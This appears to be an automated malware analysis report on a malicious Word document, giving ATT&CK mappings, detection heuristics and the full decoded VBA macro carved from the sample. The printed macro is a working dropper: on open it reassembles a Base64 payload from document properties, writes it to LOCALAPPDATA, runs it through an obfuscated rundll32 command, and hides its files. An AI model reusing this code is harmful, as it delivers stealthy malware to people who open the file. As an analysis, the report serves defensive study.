MALICIOUS
Risk Score: 158

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1140 Deobfuscate or Obfuscate Malicious Code
- T1566.001 Spearphishing Attachment
The file contains legacy WordBasic macros, specifically an AutoOpen macro, a common technique for initial execution in older Office documents. The macro is designed to decode and execute a Base64-encoded payload, indicating downloader or dropper functionality. The presence of a heap-spray pattern further suggests memory manipulation for exploit execution. While the specific family is not identifiable, the overall behavior points to a malicious document designed to deliver a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6347239-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6347239-0
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): repeated 0x41 ("A") bytes found.
  Disassembly: attempted x86 opcode disassembly of offsets 00025459 through 000254B8 (96 consecutive bytes) shows every byte is 41, each decoding as inc ecx.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): matched lines in script:
  Attribute VB_Name = "NewMacros"
  Sub AutoOpen()
  Execute
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): matched lines in script:
  'save decoded file
  Path = Environ("LOCALAPPDATA") + "\" + "netwf" + ".dat"
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://ccdcoe.org/ (in document text, OLE body)
  - http://cyber.army.mil/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://www.iec.ch (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/t/pg/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/Dimensions# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/Font# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/g/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4429 bytes |

SHA-256: da175d2a4c091734724f52fd0cb76273348d4c24f47149e7e9747d0e04b20625

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Execute
End Sub
Private Function DecodeBase64(base64) As Byte()
Const decodeTable = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If 0 <> Len(base64) Mod 4 Then
Exit Function
End If
outputLen = (Len(base64) / 4) * 3
If "=" = Mid(base64, Len(base64), 1) Then
outputLen = outputLen - 1
End If
If "=" = Mid(base64, Len(base64) - 1, 1) Then
outputLen = outputLen - 1
End If
Dim decodedBytes() As Byte
ReDim decodedBytes(outputLen - 1)
outputIndex = 0
For quartet = 1 To Len(base64) Step 4
groupBase64Number = 0
Const base = 64
realBytesInThisGroup = 3
For i = 0 To 3
inputChar = Mid(base64, quartet + i, 1)
indexInTable = 0
If "=" = inputChar Then
realBytesInThisGroup = realBytesInThisGroup - 1
Else
indexInTable = InStr(1, decodeTable, inputChar, vbBinaryCompare) - 1
End If
If -1 = indexInTable Then
Exit Function
End If
groupBase64Number = (groupBase64Number * base) + indexInTable
Next
groupBase64Number = Hex(groupBase64Number)
'add leading zeroes, lengt of hex = 6:
groupBase64Number = String(6 - Len(groupBase64Number), "0") & groupBase64Number
'split hex number into 3 groups, 2 hex characters each:
decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 1, 2))
outputIndex = outputIndex + 1
If realBytesInThisGroup > 1 Then
decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 3, 2))
outputIndex = outputIndex + 1
If realBytesInThisGroup > 2 Then
decodedBytes(outputIndex) = CByte("&H" & Mid(groupBase64Number, 5, 2))
outputIndex = outputIndex + 1
End If
End If
Next
DecodeBase64 = decodedBytes
End Function
Private Sub Execute()
Dim Path As String
Dim FileNum As Long
Dim bin() As Byte
Dim cmdLine As String
Const HIDDEN_WINDOW = 1
strComputer = "."
'extract and decode encoded file
Subject = ActiveDocument.BuiltInDocumentProperties.Item("Subject")
Subject = Right(Subject, Len(Subject) - 50)
Company = ActiveDocument.BuiltInDocumentProperties.Item("Company")
Company = Right(Company, Len(Company) - 50)
Category = ActiveDocument.BuiltInDocumentProperties.Item("Category")
Category = Right(Category, Len(Category) - 50)
Hyperlink_base = ActiveDocument.BuiltInDocumentProperties.Item("Hyperlink base")
Hyperlink_base = Right(Hyperlink_base, Len(Hyperlink_base) - 50)
Comments = ActiveDocument.BuiltInDocumentProperties.Item("Comments")
Comments = Right(Comments, Len(Comments) - 50)
base64 = Subject + Company + Category + Hyperlink_base + Comments
bin = DecodeBase64(base64)
'save decoded file
Path = Environ("LOCALAPPDATA") + "\" + "netwf" + ".dat"
PathPld = Environ("LOCALAPPDATA") + "\" + "netwf" + ".dll"
PathPldBt = Environ("LOCALAPPDATA") + "\" + "netwf" + ".bat"
If Dir(PathPld, vbHidden) <> "" Then
Exit Sub
End If
FileNum = FreeFile
Open Path For Binary Access Write As #FileNum
Put #FileNum, 1, bin
Close #FileNum
cmdLine = "C:\" + "###" + "Win" + "###" + "dow" + "###" + "s\Sy" + "###" + "ste" + "###" + "m32\" + "run" + "###" + "dll" + "32" + "#" + ".exe " + """" + Path + """" + "###" + ",KlpSvc"
WordBasic.[Shell] Replace(cmdLine, "#", "")
If Dir(PathPld) <> "" Then
SetAttr PathPld, vbHidden
End If
If Dir(PathPldBt) <> "" Then
SetAttr PathPldBt, vbHidden
End If
If Dir(Path) <> "" Then
Kill Path
End If
End Sub